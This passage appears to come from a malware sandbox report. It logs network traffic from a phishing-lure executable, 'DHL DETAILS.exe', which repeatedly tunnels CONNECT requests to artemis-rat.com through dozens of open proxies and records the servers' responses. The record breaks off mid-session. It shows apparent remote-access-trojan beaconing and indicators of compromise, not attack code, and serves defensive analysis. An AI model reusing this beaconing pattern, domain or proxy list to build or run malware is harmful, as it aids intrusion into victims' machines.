                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    938192.168.2.552940222.255.238.159806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.003160000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.368844032 CET481INHTTP/1.1 302 Found
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                    Location: https://ktxcomay.com.vn
                                                                                    Content-Length: 289
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 74 78 63 6f 6d 61 79 2e 63 6f 6d 2e 76 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://ktxcomay.com.vn">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    939192.168.2.552975182.106.220.25290916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.003355980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.355335951 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    940192.168.2.552990203.19.38.11410806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.003356934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.675225019 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.22.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    941192.168.2.55298694.30.152.172806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.003539085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    942192.168.2.55055850.63.12.33451346352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.008907080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036441088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    943192.168.2.55203835.209.198.222806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.009010077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036449909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    944192.168.2.55201051.158.105.107163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.009967089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036452055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    945192.168.2.55299920.111.54.1681236352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.013849974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.312079906 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED
                                                                                    Mar 9, 2024 13:14:17.130774021 CET319INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:16 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    946192.168.2.552900116.199.168.141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.019232035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    947192.168.2.55195245.11.95.16660146352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.025055885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.498557091 CET39INHTTP/1.0 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    948192.168.2.55028913.81.217.201806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.027621031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.617181063 CET536INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Server: Apache/2.4.29 (Ubuntu)
                                                                                    Content-Length: 618
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 63 69 62 65 72 73 65 67 75 72 69 64 61 64 40 61 75 64 65 61 2e 65 73 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at ciberseguridad@audea.es to inform the
                                                                                    Mar 9, 2024 13:14:17.617232084 CET274INData Raw: 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73
                                                                                    Data Ascii: m of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Por


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    949192.168.2.55299180.67.8.6806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.029341936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    950192.168.2.55195051.38.50.24992246352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.030303001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.161705017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    951192.168.2.550510156.232.9.19480806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.035092115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.161626101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.177093029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:28.270883083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    952192.168.2.55302398.170.57.24941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.042973995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    953192.168.2.550381195.78.100.16236296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.046041012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    954192.168.2.55302158.234.116.197806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.046272039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.781187057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    955192.168.2.550458138.68.155.22199876352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.053564072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.223830938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    956192.168.2.55302049.4.48.12888886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.054075956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    957192.168.2.55302852.54.249.241806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.058079958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.273484945 CET66INHTTP/1.1 400 BAD_REQUEST
                                                                                    Content-Length: 0
                                                                                    Connection: Close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    958192.168.2.55185891.134.140.160515136352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.058093071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.567641020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.166001081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.102178097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    959192.168.2.55303444.190.9.65481006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.066907883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    960192.168.2.55050337.187.91.192117216352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.067370892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.223706961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    961192.168.2.552234162.214.225.223432656352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.073255062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    962192.168.2.55285436.134.91.8288886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.073494911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    963192.168.2.55251424.249.199.441456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.074709892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    964192.168.2.553026177.12.118.160806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.096107006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    965192.168.2.553032121.128.194.154806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:16.167074919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
